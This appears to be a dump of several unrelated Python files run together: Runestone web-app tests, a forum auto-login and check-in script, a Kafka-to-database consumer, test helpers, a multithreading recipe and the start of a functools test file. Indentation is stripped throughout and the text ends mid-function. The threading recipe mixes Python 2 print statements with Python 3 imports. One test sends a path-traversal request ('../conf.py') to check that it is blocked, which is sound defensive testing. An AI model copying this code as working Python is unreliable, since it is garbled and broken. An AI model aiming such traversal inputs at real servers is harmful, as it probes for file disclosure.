for expected_price, actual_price in [(0, None), (0, -100), (0, 0), (15, 15)]:
db(db.courses.id == base_course.course_id).update(student_price=actual_price)
assert default_controller._course_price(base_course.course_id) == expected_price
# Test in a child course as well. Create a matrix of all base course prices by all child course prices.
for expected_price, actual_base_price, actual_child_price in [
(0, None, None),
(0, None, 0),
(0, None, -1),
(2, None, 2),
(0, 0, None),
(0, 0, 0),
(0, 0, -1),
(2, 0, 2),
(0, -2, None),
(0, -2, 0),
(0, -2, -1),
(2, -2, 2),
(3, 3, None),
(0, 3, 0),
(0, 3, -1),
(2, 3, 2),
]:
db(db.courses.id == base_course.course_id).update(
student_price=actual_base_price
)
db(db.courses.id == child_course.course_id).update(
student_price=actual_child_price
)
assert (
default_controller._course_price(child_course.course_id) == expected_price
)
# Check that setting the price causes redirects to the correct location (payment vs. donation) when registering for a course or adding a new course.
def test_price_free(runestone_db_tools, test_user):
db = runestone_db_tools.db
course_1 = runestone_db_tools.create_course(student_price=0)
course_2 = runestone_db_tools.create_course("test_course_2", student_price=0)
# Check registering for a free course.
test_user_1 = test_user("test_user_1", "password_1", course_1, is_free=True)
# Verify the user was added to the ``user_courses`` table.
assert (
db(
(db.user_courses.course_id == test_user_1.course.course_id)
& (db.user_courses.user_id == test_user_1.user_id)
)
.select()
.first()
)
# Check adding a free course.
test_user_1.update_profile(course_name=course_2.course_name, is_free=True)
# Same as above.
assert (
db(
(db.user_courses.course_id == course_2.course_id)
& (db.user_courses.user_id == test_user_1.user_id)
)
.select()
.first()
)
def test_price_paid(runestone_db_tools, test_user):
db = runestone_db_tools.db
# Check registering for a paid course.
course_1 = runestone_db_tools.create_course(student_price=1)
course_2 = runestone_db_tools.create_course("test_course_2", student_price=1)
# Check registering for a paid course.
test_user_1 = test_user("test_user_1", "password_1", course_1, is_free=False)
# Until payment is provided, the user shouldn't be added to the ``user_courses`` table. Ensure that refresh, login/logout, profile changes, adding another class, etc. don't allow access.
test_user_1.test_client.logout()
test_user_1.login()
test_user_1.test_client.validate("default/index")
# Check adding a paid course.
test_user_1.update_profile(course_name=course_2.course_name, is_free=False)
# Verify no access without payment.
assert (
not db(
(db.user_courses.course_id == course_1.course_id)
& (db.user_courses.user_id == test_user_1.user_id)
)
.select()
.first()
)
assert (
not db(
(db.user_courses.course_id == course_2.course_id)
& (db.user_courses.user_id == test_user_1.user_id)
)
.select()
.first()
)
# Check that payments are handled correctly.
def test_payments(runestone_controller, runestone_db_tools, test_user):
if not runestone_controller.settings.STRIPE_SECRET_KEY:
pytest.skip("No Stripe keys provided.")
db = runestone_db_tools.db
course_1 = runestone_db_tools.create_course(student_price=100)
test_user_1 = test_user("test_user_1", "password_1", course_1, is_free=False)
def did_payment():
return (
db(
(db.user_courses.course_id == course_1.course_id)
& (db.user_courses.user_id == test_user_1.user_id)
)
.select()
.first()
)
# Test some failing tokens.
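    # (These are Stripe's documented test tokens: the first two are designed to make
    # the charge fail, while "tok_visa" below simulates a successful card payment.)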
assert not did_payment()
for token in ["tok_chargeCustomerFail", "tok_chargeDeclined"]:
test_user_1.make_payment(token)
assert not did_payment()
test_user_1.make_payment("tok_visa")
assert did_payment()
# Check that the payment record is correct.
payment = (
db(
(db.user_courses.user_id == test_user_1.user_id)
& (db.user_courses.course_id == course_1.course_id)
& (db.user_courses.id == db.payments.user_courses_id)
)
.select(db.payments.charge_id)
.first()
)
assert payment.charge_id
# Test the LP endpoint.
@pytest.mark.skipif(six.PY2, reason="Requires Python 3.")
def test_lp(test_user_1):
test_user_1.login()
# Check that omitting parameters produces an error.
ret = test_user_1.hsblog(event="lp_build")
assert "No feedback provided" in ret["errors"][0]
# Check that database entries are validated.
ret = test_user_1.hsblog(
event="lp_build",
# This div_id is too long. Everything else is OK.
div_id="X" * 1000,
course=test_user_1.course.course_name,
builder="unsafe-python",
answer=json.dumps({"code_snippets": ["def one(): return 1"]}),
)
assert "div_id" in ret["errors"][0]
# Check a passing case
def assert_passing():
ret = test_user_1.hsblog(
event="lp_build",
div_id="lp_demo_1",
course=test_user_1.course.course_name,
builder="unsafe-python",
answer=json.dumps({"code_snippets": ["def one(): return 1"]}),
)
assert "errors" not in ret
assert ret["correct"] == 100
assert_passing()
# Send lots of jobs to test out the queue. Skip this for now -- not all the useinfo entries get deleted, which causes ``test_getNumOnline`` to fail.
if False:
threads = [Thread(target=assert_passing) for x in range(5)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Test dynamic book routing.
def test_dynamic_book_routing_1(test_client, test_user_1):
test_user_1.login()
dbr_tester(test_client, test_user_1, True)
# Test that a draft is accessible only to instructors.
test_user_1.make_instructor()
test_user_1.update_profile(course_name=test_user_1.course.course_name)
test_client.validate(
"books/draft/{}/index.html".format(test_user_1.course.base_course),
"The red car drove away.",
)
# Test the no-login case.
def test_dynamic_book_routing_2(test_client, test_user_1):
test_client.logout()
# Test for a book that doesn't require a login. First, change the book to not require a login.
db = test_user_1.runestone_db_tools.db
db(db.courses.course_name == test_user_1.course.base_course).update(
login_required=False
)
db.commit()
dbr_tester(test_client, test_user_1, False)
def dbr_tester(test_client, test_user_1, is_logged_in):
# Test error cases.
validate = test_client.validate
base_course = test_user_1.course.base_course
    # A non-existent course.
if is_logged_in:
validate("books/published/xxx", "Course Selection")
else:
validate("books/published/xxx", expected_status=404)
    # A non-existent page.
validate("books/published/{}/xxx".format(base_course), expected_status=404)
# A directory.
validate(
"books/published/{}/test_chapter_1".format(base_course), expected_status=404
)
# Attempt to access files outside a course.
validate("books/published/{}/../conf.py".format(base_course), expected_status=404)
# Attempt to access a course we're not registered for. TODO: Need to create another base course for this to work.
##if is_logged_in:
## #validate('books/published/{}/index.html'.format(base_course), [
## 'Sorry you are not registered for this course.'
## ])
# A valid page. Check the book config as well.
validate(
"books/published/{}/index.html".format(base_course),
[
"The red car drove away.",
"eBookConfig.course = '{}';".format(
test_user_1.course.course_name if is_logged_in else base_course
),
"eBookConfig.basecourse = '{}';".format(base_course),
],
)
# Drafts shouldn't be accessible by students.
validate(
"books/draft/{}/index.html".format(base_course),
"Insufficient privileges" if is_logged_in else "Username",
)
# Check routing in a base course.
if is_logged_in:
test_user_1.update_profile(
course_name=test_user_1.course.base_course, is_free=True
)
validate(
"books/published/{}/index.html".format(base_course),
[
"The red car drove away.",
"eBookConfig.course = '{}';".format(base_course),
"eBookConfig.basecourse = '{}';".format(base_course),
],
)
# Test static content.
validate(
"books/published/{}/_static/runestone-custom-sphinx-bootstrap.css".format(
base_course
),
"background-color: #fafafa;",
)
def test_assignments(test_client, runestone_db_tools, test_user):
course_3 = runestone_db_tools.create_course("test_course_3")
test_instructor_1 = test_user("test_instructor_1", "password_1", course_3)
test_instructor_1.make_instructor()
test_instructor_1.login()
db = runestone_db_tools.db
name_1 = "test_assignment_1"
name_2 = "test_assignment_2"
name_3 = "test_assignment_3"
# Create an assignment -- using createAssignment
test_client.post("admin/createAssignment", data=dict(name=name_1))
assign1 = (
db(
(db.assignments.name == name_1)
& (db.assignments.course == test_instructor_1.course.course_id)
)
.select()
.first()
)
assert assign1
# Make sure you can't create two assignments with the same name
test_client.post("admin/createAssignment", data=dict(name=name_1))
assert "EXISTS" in test_client.text
# Rename assignment
test_client.post("admin/createAssignment", data=dict(name=name_2))
assign2 = (
db(
(db.assignments.name == name_2)
& (db.assignments.course == test_instructor_1.course.course_id)
)
.select()
.first()
)
assert assign2
test_client.post(
"admin/renameAssignment", data=dict(name=name_3, original=assign2.id)
)
assert db(db.assignments.name == name_3).select().first()
assert not db(db.assignments.name == name_2).select().first()
# Make sure you can't rename an assignment to an already used assignment
test_client.post(
"admin/renameAssignment", data=dict(name=name_3, original=assign1.id)
)
assert "EXISTS" in test_client.text
# Delete an assignment -- using removeassignment
test_client.post("admin/removeassign", data=dict(assignid=assign1.id))
assert not db(db.assignments.name == name_1).select().first()
test_client.post("admin/removeassign", data=dict(assignid=assign2.id))
assert not db(db.assignments.name == name_3).select().first()
test_client.post("admin/removeassign", data=dict(assignid=9999999))
assert "Error" in test_client.text
def test_instructor_practice_admin(test_client, runestone_db_tools, test_user):
course_4 = runestone_db_tools.create_course("test_course_1")
test_student_1 = test_user("test_student_1", "password_1", course_4)
test_student_1.logout()
test_instructor_1 = test_user("test_instructor_1", "password_1", course_4)
test_instructor_1.make_instructor()
test_instructor_1.login()
db = runestone_db_tools.db
course_start_date = datetime.datetime.strptime(
course_4.term_start_date, "%Y-%m-%d"
).date()
start_date = course_start_date + datetime.timedelta(days=13)
end_date = datetime.datetime.today().date() + datetime.timedelta(days=30)
max_practice_days = 40
max_practice_questions = 400
day_points = 1
question_points = 0.2
questions_to_complete_day = 5
graded = 0
# Test the practice tool settings for the course.
flashcard_creation_method = 2
test_client.post(
"admin/practice",
data={
"StartDate": start_date,
"EndDate": end_date,
"graded": graded,
"maxPracticeDays": max_practice_days,
"maxPracticeQuestions": max_practice_questions,
"pointsPerDay": day_points,
"pointsPerQuestion": question_points,
"questionsPerDay": questions_to_complete_day,
"flashcardsCreationType": 2,
"question_points": question_points,
},
)
practice_settings_1 = (
db(
(db.course_practice.auth_user_id == test_instructor_1.user_id)
& (db.course_practice.course_name == course_4.course_name)
& (db.course_practice.start_date == start_date)
& (db.course_practice.end_date == end_date)
& (
db.course_practice.flashcard_creation_method
== flashcard_creation_method
)
& (db.course_practice.graded == graded)
)
.select()
.first()
)
assert practice_settings_1
if practice_settings_1.spacing == 1:
assert practice_settings_1.max_practice_days == max_practice_days
assert practice_settings_1.day_points == day_points
assert (
practice_settings_1.questions_to_complete_day == questions_to_complete_day
)
else:
assert practice_settings_1.max_practice_questions == max_practice_questions
assert practice_settings_1.question_points == question_points
# Test instructor adding a subchapter to the practice tool for students.
# I need to call set_tz_offset to set timezoneoffset in the session.
test_client.post("ajax/set_tz_offset", data={"timezoneoffset": 0})
# The reason I'm manually stringifying the list value is that test_client.post does something strange with compound objects instead of passing them to json.dumps.
test_client.post(
"admin/add_practice_items",
data={"data": '["1. Test chapter 1/1.2 Subchapter B"]'},
)
practice_settings_1 = (
db(
(db.user_topic_practice.user_id == test_student_1.user_id)
& (db.user_topic_practice.course_name == course_4.course_name)
& (db.user_topic_practice.chapter_label == "test_chapter_1")
& (db.user_topic_practice.sub_chapter_label == "subchapter_b")
)
.select()
.first()
)
assert practice_settings_1
def test_deleteaccount(test_client, runestone_db_tools, test_user):
course_3 = runestone_db_tools.create_course("test_course_3")
the_user = test_user("user_to_delete", "password_1", course_3)
the_user.login()
validate = the_user.test_client.validate
the_user.hsblog(
event="mChoice",
act="answer:1:correct",
answer="1",
correct="T",
div_id="subc_b_1",
course="test_course_3",
)
validate("default/delete", "About Runestone", data=dict(deleteaccount="checked"))
db = runestone_db_tools.db
res = db(db.auth_user.username == "user_to_delete").select().first()
print(res)
time.sleep(2)
assert not db(db.useinfo.sid == "user_to_delete").select().first()
assert not db(db.code.sid == "user_to_delete").select().first()
for t in [
"clickablearea",
"codelens",
"dragndrop",
"fitb",
"lp",
"mchoice",
"parsons",
"shortanswer",
]:
assert (
not db(db["{}_answers".format(t)].sid == "user_to_delete").select().first()
)
# Test the grades report.
# When this test fails it is very difficult to figure out why: the data structures
# being compared are very large, which makes it hard to pin down exactly what is
# failing, and there seems to be a dictionary in here somewhere whose ordering
# shifts around. I think it is currently broken because more components now
# return a percent-correct value.
@pytest.mark.skip(reason="TODO: This test is unpredictable and needs to be updated.")
def test_grades_1(runestone_db_tools, test_user, tmp_path):
# Create test users.
course = runestone_db_tools.create_course()
course_name = course.course_name
# **Create test data**
# ======================
# Create test users.
test_user_array = [
test_user(
"test_user_{}".format(index), "x", course, last_name="user_{}".format(index)
)
for index in range(4)
]
def assert_passing(index, *args, **kwargs):
res = test_user_array[index].hsblog(*args, **kwargs)
assert "errors" not in res
# Prepare common arguments for each question type.
shortanswer_kwargs = dict(
event="shortanswer", div_id="test_short_answer_1", course=course_name
)
fitb_kwargs = dict(event="fillb", div_id="test_fitb_1", course=course_name)
mchoice_kwargs = dict(event="mChoice", div_id="test_mchoice_1", course=course_name)
lp_kwargs = dict(
event="lp_build",
div_id="lp_demo_1",
course=course_name,
builder="unsafe-python",
)
unittest_kwargs = dict(event="unittest", div_id="units2", course=course_name)
# *User 0*: no data supplied
##----------------------------
# *User 1*: correct answers
##---------------------------
# It doesn't matter which user logs out, since all three users share the same client.
logout = test_user_array[2].test_client.logout
logout()
test_user_array[1].login()
assert_passing(1, act=test_user_array[1].username, **shortanswer_kwargs)
assert_passing(1, answer=json.dumps(["red", "away"]), **fitb_kwargs)
assert_passing(1, answer="0", correct="T", **mchoice_kwargs)
assert_passing(
1, answer=json.dumps({"code_snippets": ["def one(): return 1"]}), **lp_kwargs
)
assert_passing(1, act="percent:100:passed:2:failed:0", **unittest_kwargs)
# *User 2*: incorrect answers
##----------------------------
logout()
test_user_array[2].login()
# Add three shortanswer answers, to make sure the number of attempts is correctly recorded.
for x in range(3):
assert_passing(2, act=test_user_array[2].username, **shortanswer_kwargs)
assert_passing(2, answer=json.dumps(["xxx", "xxxx"]), **fitb_kwargs)
assert_passing(2, answer="1", correct="F", **mchoice_kwargs)
assert_passing(
2, answer=json.dumps({"code_snippets": ["def one(): return 2"]}), **lp_kwargs
)
assert_passing(2, act="percent:50:passed:1:failed:1", **unittest_kwargs)
# *User 3*: no data supplied, and no longer in course.
##----------------------------------------------------
# Wait until the autograder is run to remove the student, so they will have a grade but not have any submissions.
# **Test the grades_report endpoint**
##====================================
tu = test_user_array[2]
def grades_report(assignment, *args, **kwargs):
return tu.test_client.validate(
"assignments/grades_report",
*args,
data=dict(chap_or_assign=assignment, report_type="assignment"),
**kwargs
)
# Test not being an instructor.
grades_report("", "About Runestone")
tu.make_instructor()
# Test an invalid assignment.
grades_report("", "Unknown assignment")
# Create an assignment.
assignment_name = "test_assignment"
assignment_id = json.loads(
tu.test_client.validate(
"admin/createAssignment", data={"name": assignment_name}
)
)[assignment_name]
assignment_kwargs = dict(
assignment=assignment_id, autograde="pct_correct", which_to_grade="first_answer"
)
# Add questions to the assignment.
def add_to_assignment(question_kwargs, points):
assert (
tu.test_client.validate(
"admin/add__or_update_assignment_question",
data=dict(
question=question_kwargs["div_id"],
points=points,
**assignment_kwargs
),
)
!= json.dumps("Error")
)
# Determine the order of the questions and the _`point values`.
add_to_assignment(shortanswer_kwargs, 0)
add_to_assignment(fitb_kwargs, 1)
add_to_assignment(mchoice_kwargs, 2)
add_to_assignment(lp_kwargs, 3)
add_to_assignment(unittest_kwargs, 4)
# Autograde the assignment.
assignment_kwargs = dict(data={"assignment": assignment_name})
assert json.loads(
tu.test_client.validate("assignments/autograde", **assignment_kwargs)
)["message"].startswith("autograded")
assert json.loads(
tu.test_client.validate("assignments/calculate_totals", **assignment_kwargs)
)["success"]
# Remove test user 3 from the course. They can't be removed from the current course, so create a new one then add this user to it.
logout()
tu = test_user_array[3]
tu.login()
new_course = runestone_db_tools.create_course("random_course_name")
tu.update_profile(course_name=new_course.course_name, is_free=True)
tu.coursechooser(new_course.course_name)
tu.removecourse(course_name)
# **Test this assignment.**
# ===========================
# Log back in as the instructor.
logout()
tu = test_user_array[2]
tu.login()
# Now, we can get the report.
grades = json.loads(grades_report(assignment_name))
# Define a regex string comparison.
class RegexEquals:
def __init__(self, regex):
self.regex = re.compile(regex)
def __eq__(self, other):
return bool(re.search(self.regex, other))
# See if a date in ISO format followed by a "Z" is close to the current time.
class AlmostNow:
def __eq__(self, other):
# Parse the date string. Assume it ends with a Z and discard this.
assert other and other[-1] == "Z"
# Per the `docs <https://docs.python.org/3/library/datetime.html#datetime.date.fromisoformat>`_, this function requires Python 3.7+.
if sys.version_info >= (3, 7):
dt = datetime.datetime.fromisoformat(other[:-1])
return datetime.datetime.utcnow() - dt < datetime.timedelta(minutes=1)
else:
# Hope for the best on older Python.
return True
# These are based on the data input for each user earlier in this test.
expected_grades = {
"colHeaders": [
"userid",
"Family name",
"Given name",
"e-mail",
"avg grade (%)",
"1",
"1",
"1",
"2.1",
"2",
],
"data": [
[
"div_id",
"",
"",
"",
"",
"test_short_answer_1",
"test_fitb_1",
"test_mchoice_1",
"lp_demo_1",
"units2",
],
[
"location",
"",
"",
"",
"",
"index - ",
"index - ",
"index - ",
"lp_demo.py - ",
"index - ",
],
[
"type",
"",
"",
"",
"",
"shortanswer",
"fillintheblank",
"mchoice",
"lp_build",
"activecode",
],
# See the `point values`_ assigned earlier.
["points", "", "", "", "", 0, 1, 2, 3, 4],
["avg grade (%)", "", "", "", ""],
["avg attempts", "", "", "", ""],
["test_user_0", "user_0", "test", "test_user_0@foo.com", 0.0],
["test_user_1", "user_1", "test", "test_user_1@foo.com", 1.0],
["test_user_2", "user_2", "test", "test_user_2@foo.com", 0.2],
["test_user_3", "user_3", "test", "test_user_3@foo.com", 0.0],
],
# Correct since the first 3 questions are all on the index page.
"mergeCells": [{"col": 5, "colspan": 3, "row": 1, "rowspan": 1}],
"orig_data": [
# User 0: not submitted.
[
# The format is:
# ``[timestamp, score, answer, correct, num_attempts]``.
[None, 0.0, None, None, None], # shortanswer
[None, 0.0, None, None, None], # fillintheblank
[None, 0.0, None, None, None], # mchoice
[None, 0.0, {}, None, None], # lp_build
[None, 0.0, "", None, None], # activecode
],
# User 1: all correct.
[
[AlmostNow(), 0.0, "test_user_1", None, 1],
[AlmostNow(), 1.0, ["red", "away"], True, 1],
[AlmostNow(), 2.0, [0], True, 1],
[
AlmostNow(),
3.0,
{"code_snippets": ["def one(): return 1"], "resultString": ""},
100.0,
1,
],
[AlmostNow(), 4.0, "percent:100:passed:2:failed:0", True, 1],
],
# User 2: all incorrect.
[
[AlmostNow(), 0.0, "test_user_2", None, 3],
[AlmostNow(), 0.0, ["xxx", "xxxx"], False, 1],
[AlmostNow(), 0.0, [1], False, 1],
[
AlmostNow(),
0.0,
{
"code_snippets": ["def one(): return 2"],
"resultString": RegexEquals(
"Traceback \\(most recent call last\\):\n"
" File "
# Use a regex for the file's path.
'"\\S*lp_demo-test.py", '
"line 6, in <module>\n"
" assert one\\(\\) == 1\n"
"AssertionError"
),
},
0.0,
1,
],
[AlmostNow(), 2.0, "percent:50:passed:1:failed:1", False, 1],
],
# User 3: not submitted.
[
# The format is:
[None, 0.0, None, None, None],
[None, 0.0, None, None, None],
[None, 0.0, None, None, None],
[None, 0.0, {}, None, None],
[None, 0.0, "", None, None],
],
],
}
# Note: on test failure, pytest will report as incorrect all the ``AlmostNow()`` and ``RegexEquals`` items, even though they may have actually compared as equal.
# assert grades == expected_grades
    # let's break this up a bit.
for k in expected_grades:
assert grades[k] == expected_grades[k]
logout()
# Test with no login.
grades_report("", "About Runestone")
def test_pageprogress(test_client, runestone_db_tools, test_user_1):
test_user_1.login()
test_user_1.hsblog(
event="mChoice",
act="answer:1:correct",
answer="1",
correct="T",
div_id="subc_b_1",
course=test_user_1.course.course_name,
)
# Since the user has answered the question the count for subc_b_1 should be 1
# cannot test the totals on the client without javascript but that is covered in the
# selenium tests on the components side.
test_user_1.test_client.validate(
"books/published/{}/test_chapter_1/subchapter_b.html".format(
test_user_1.course.base_course
),
'"subc_b_1": 1',
)
assert '"LearningZone_poll": 0' in test_user_1.test_client.text
assert '"subc_b_fitb": 0' in test_user_1.test_client.text
def test_lockdown(test_client, test_user_1):
test_user_1.login()
base_course = test_user_1.course.base_course
res = test_client.validate("books/published/{}/index.html".format(base_course))
assert '/default/user/login"> </a>' in res
assert "Runestone in social media:" in res
assert ">Change Course</a></li>" in res
assert 'id="profilelink">Edit' in res
assert '<ul class="dropdown-menu user-menu">' in res
assert 'div id="fb-root"></div' in res
assert "<span id='numuserspan'></span><span class='loggedinuser'></span>" in res
assert '<script async src="https://hypothes.is/embed.js"></script>' in res
# Do basic login/logout tests using Selenium. This is just to make sure Selenium works, rather than to actually test something new.
def test_selenium(test_user_1, selenium_user):
selenium_user_1 = selenium_user(test_user_1)
selenium_user_1.login()
selenium_user_1.logout()
|
AutoEetopSign.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import logging
import re
from bs4 import BeautifulSoup
import requests
import sys
import time
from PIL import Image
import threading
class AutoDiscuz:
def __init__(self, forum_url, user_name, password):
"""初始化论坛 url、用户名、密码和代理服务器."""
self.header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.4",
"Referer": "https://bbs.eetop.cn/member.php?mod=logging&action=login"
""}
self.header2 = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.4",
"Accept": "image/webp,image/apng,image/*,*/*;q=0.8",
"Referer": "https://bbs.eetop.cn/member.php?mod=logging&action=login"}
self.forum_url = forum_url
self.is_login = False
self.post_data = {"username": user_name,
"password": password,
"seccodemodid": "member::logging",
"loginfield": 'username'
}
self.seccode = ''
self.formhash = ''
self.loginhash = ''
self.session = requests.Session()
        #logging.basicConfig()  # Initialize logging; otherwise no output from requests will be visible.
#logging.getLogger().setLevel(logging.DEBUG)
#requests_log = logging.getLogger("requests.packages.urllib3")
#requests_log.setLevel(logging.DEBUG)
#requests_log.propagate = True
def login(self):
"""登录论坛."""
url_start = self.forum_url + "/member.php?mod=logging&action=login"
req = self.session.get(url_start, headers=self.header)
        '''Find the hash values (seccode / formhash / loginhash)'''
soup = BeautifulSoup(req.text, 'lxml')
find0 = re.findall(r'\"seccode_(.*?)\"', req.text)
find1 = re.findall(r'name=\"formhash\" value=\"(.*?)\"', req.text)
find2 = re.findall(r'loginhash=(.*?)\"', req.text)
if find0 and find1:
self.seccode = find0[0]
self.formhash = find1[0]
self.loginhash = find2[0]
else:
print("can't find seccode or formhash")
sys.exit(2)
url_seccode = self.forum_url + '/misc.php?mod=seccode&action=update&idhash=%s&modid=member::logging' %self.seccode
req = self.session.get(url_seccode, headers=self.header)
        '''Find the captcha image'''
find = re.findall(r'src=\"(misc\.php\?.*?)\"', req.text)
if find:
seccode_pic_url = find[0]
else:
print("can't find seccode")
sys.exit(2)
url_seccode_pic = self.forum_url + '/' + seccode_pic_url
print(url_seccode_pic)
self.session.headers.clear()
self.header2['Referer'] = url_seccode
req = self.session.get(url_seccode_pic, headers=self.header2)
with open('./captcha.jpg', 'wb') as f:
f.write(req.content)
        capt = input('Please enter the captcha shown in the image: ')
        '''Check whether the captcha is correct'''
url_verif_seccode = self.forum_url + '/misc.php?mod=seccode&action=check&inajax=1&modid=member::logging&idhash=%s&secverify=%s' %(self.seccode, capt)
req = self.session.get(url_verif_seccode, headers=self.header)
print(req.content)
        '''Log in'''
url_login = self.forum_url + "/member.php?mod=logging&action=login&loginsubmit=yes&loginhash=%s" %self.loginhash
print(url_login)
self.post_data["formhash"] = self.formhash
self.post_data["seccodehash"] = self.seccode
self.post_data["seccodeverify"] = capt
self.post_data["loginsubmit"] = 'true'
self.post_data["referer"] = 'https://bbs.eetop.cn/'
print(self.post_data)
self.session.headers.clear()
req = self.session.post(url_login, data=self.post_data, headers=self.header)
# url_code = self.forum_url + AutoDiscuz.LOGIN_CODE
# url = self.forum_url + AutoDiscuz.LOGIN_URL
# AutoDiscuz.LOGIN_POST["username"] = self.user_name
# AutoDiscuz.LOGIN_POST["password"] = self.password
# print(AutoDiscuz.LOGIN_POST)
# req = self.session.post(url, data=AutoDiscuz.LOGIN_POST)
# match = re.findall(r'name=\"formhash\" value=\"(.*?)\"', req.text)
# if match:
# AutoDiscuz.LOGIN_POST["formhash"] = match[0]
# else:
# print('can find formhash')
# sys.exit(2)
# if self.user_name in req.text:
# self.is_login = True
# if self.get_formhash():
# logging.info("Login success!")
# return
# else:
# logging.error("Login faild!")
# if self.is_login:
# self.is_login = False
# return
# req = self.session.post(url_code, headers=self.header)
# match = re.findall("\'seccode_(.*?)\'", req.text)
# if match:
# AutoDiscuz.LOGIN_POST["seccode"] = match[0]
# else:
# print('can find seccode')
# sys.exit(2)
# soup = BeautifulSoup(req.text, 'lxml')
# info = soup.select("#vseccode_cSHPWGkw img[src]")[0].get("src")
# req = self.session.post(self.forum_url + "/" + info, headers=self.header2)
# with open('./captcha.jpg', 'wb') as f:
# f.write(req.content)
# #img = Image.open('./captcha.jpg')
# #img_thread = threading.Thread(target=img.show, daemon=True)
# #img_thread.start()
        # capt = input('Please enter the captcha shown in the image: ')
# AutoDiscuz.LOGIN_POST["seccodeverify"] = capt
# AutoDiscuz.LOGIN_POST["loginfield"] = 'username'
def check_in(self):
url = self.forum_url + \
"/home.php?mod=task&do=apply&id=14"
content = self.session.get(url).text
soup = BeautifulSoup(content, 'lxml')
info = soup.select(".f_c div p")[0].get_text()
if info:
self.is_login = True
print(info)
else:
self.is_login = False
def main():
auto_discuz = AutoDiscuz("https://bbs.eetop.cn", "【UserName】", "【Password】")
auto_discuz.login()
while True:
auto_discuz.check_in()
if auto_discuz.is_login:
time.sleep(5 * 60 * 59)
else:
print("break")
requests.post("https://sc.ftqq.com/【KEY】.send?title=eetop登录")
break
if __name__ == "__main__":
main()
# time.sleep(5 * 60 * 59)
|
main.py
|
#!/usr/bin/python3
from messaging import Consumer
from db import DataBase
from threading import Thread, Condition
import json
import time
import os
kafka_topic = "seg_analytics_data"
kafka_group = "kafka_to_db_converter"
class KafkaToDB(object):
def __init__(self):
super(KafkaToDB,self).__init__()
self._db=DataBase()
self._cache=[]
self._cond=Condition()
Thread(target=self._ingest).start()
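    # Batching design: _send() appends incoming records to an in-memory cache under
    # the condition variable and notifies; the _ingest() worker thread wakes up, swaps
    # the cache for a fresh list while holding the lock, and saves the whole batch
    # to the database in a single call.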
def _ingest(self):
while True:
self._cond.acquire()
self._cond.wait()
bulk=self._cache
self._cache=[]
self._cond.release()
try:
self._db.save(bulk)
print("SaveToDB #"+str(len(bulk)), flush=True)
except Exception as e:
print("Exception: "+str(e), flush=True)
def _send(self, data):
self._cond.acquire()
self._cache.append(data)
self._cond.notify()
self._cond.release()
def listen(self):
while True:
print("listening to messages")
try:
c=Consumer(kafka_group)
for msg in c.messages(kafka_topic):
try:
value=json.loads(msg)
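                        # "timestamp" is in nanoseconds; convert to seconds and, if the
                        # message carries a per-segment offset ("seg_time" under "tags"
                        # or "tag"), add it to obtain the segment's absolute time.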
value["time"]=float(value["timestamp"])/1.0e9
if "tags" in value:
if "seg_time" in value["tags"]:
value["time"]=value["time"]+float(value["tags"]["seg_time"])
if "tag" in value:
if "seg_time" in value["tag"]:
value["time"]=value["time"]+float(value["tag"]["seg_time"])
stream=value["source"].split("/")[-2]
self._send((stream, value))
except Exception as e:
print("Exception: "+str(e), flush=True)
except Exception as e:
print("Exception: "+str(e), flush=True)
time.sleep(2)
k2d=KafkaToDB()
k2d.listen()
|
utils.py
|
"""
Utility functions used by the tests.
"""
import contextlib
import threading
def sort_fields(fields):
"""Helper to ensure named fields are sorted for the test."""
return ', '.join(sorted(field.lstrip() for field in fields.split(',')))
def skip_first_line(value):
"""Returns everything after the first newline in the string."""
parts = value.split("\n", 1)
return parts[1] if len(parts) == 2 else ''
def spawn(targets):
"""Spawns a bunch of threads for given targets and waits on them."""
threads = []
for target in targets:
thread = threading.Thread(target=target)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
@contextlib.contextmanager
def set_temporarily(obj, attr, value):
"""Temporarily change the value of an object's attribute."""
try:
original = getattr(obj, attr)
setattr(obj, attr, value)
yield
finally:
setattr(obj, attr, original)
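# A minimal usage sketch for set_temporarily (illustrative only; Config is a
# made-up stand-in, not part of the test suite):
#
#     class Config:
#         retries = 3
#
#     cfg = Config()
#     with set_temporarily(cfg, "retries", 10):
#         assert cfg.retries == 10
#     assert cfg.retries == 3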
|
cb2_9_5_sol_1.py
|
import threading, time, queue
class MultiThread(object):
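    # Worker-pool pattern: a fixed number of threads pulls arguments from a shared
    # iterator (guarded by a lock) and, when queue_results is True, pushes
    # (args, result) pairs onto a queue.Queue for retrieval via get().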
def __init__(self, function, argsVector, maxThreads=5, queue_results=False):
self._function = function
self._lock = threading.Lock()
        self._nextArgs = iter(argsVector).__next__
self._threadPool = [ threading.Thread(target=self._doSome)
for i in range(maxThreads) ]
if queue_results:
            self._queue = queue.Queue()
else:
self._queue = None
def _doSome(self):
while True:
self._lock.acquire()
try:
try:
args = self._nextArgs()
except StopIteration:
break
finally:
self._lock.release()
result = self._function(args)
if self._queue is not None:
self._queue.put((args, result))
def get(self, *a, **kw):
if self._queue is not None:
return self._queue.get(*a, **kw)
else:
            raise ValueError('Not queueing results')
def start(self):
for thread in self._threadPool:
time.sleep(0) # necessary to give other threads a chance to run
thread.start()
def join(self, timeout=None):
for thread in self._threadPool:
thread.join(timeout)
if __name__=="__main__":
import random
def recite_n_times_table(n):
for i in range(2, 11):
print "%d * %d = %d" % (n, i, n * i)
time.sleep(0.3 + 0.3*random.random())
mt = MultiThread(recite_n_times_table, range(2, 11))
mt.start()
mt.join()
print "Well done kids!"
|
test_functools.py
|
import abc
import builtins
import collections
import collections.abc
import copy
from itertools import permutations
import pickle
from random import choice
import sys
from test import support
import threading
import time
import typing
import unittest
import unittest.mock
import os
import weakref
import gc
from weakref import proxy
import contextlib
from test.support import import_helper
from test.support import threading_helper
from test.support.script_helper import assert_python_ok
import functools
py_functools = import_helper.import_fresh_module('functools',
blocked=['_functools'])
c_functools = import_helper.import_fresh_module('functools')
decimal = import_helper.import_fresh_module('decimal', fresh=['_decimal'])
@contextlib.contextmanager
def replaced_module(name, replacement):
original_module = sys.modules[name]
sys.modules[name] = replacement
try:
yield
finally:
sys.modules[name] = original_module
def capture(*args, **kw):
"""capture all positional and keyword arguments"""
return args, kw
def signature(part):
""" return the signature of a partial object """
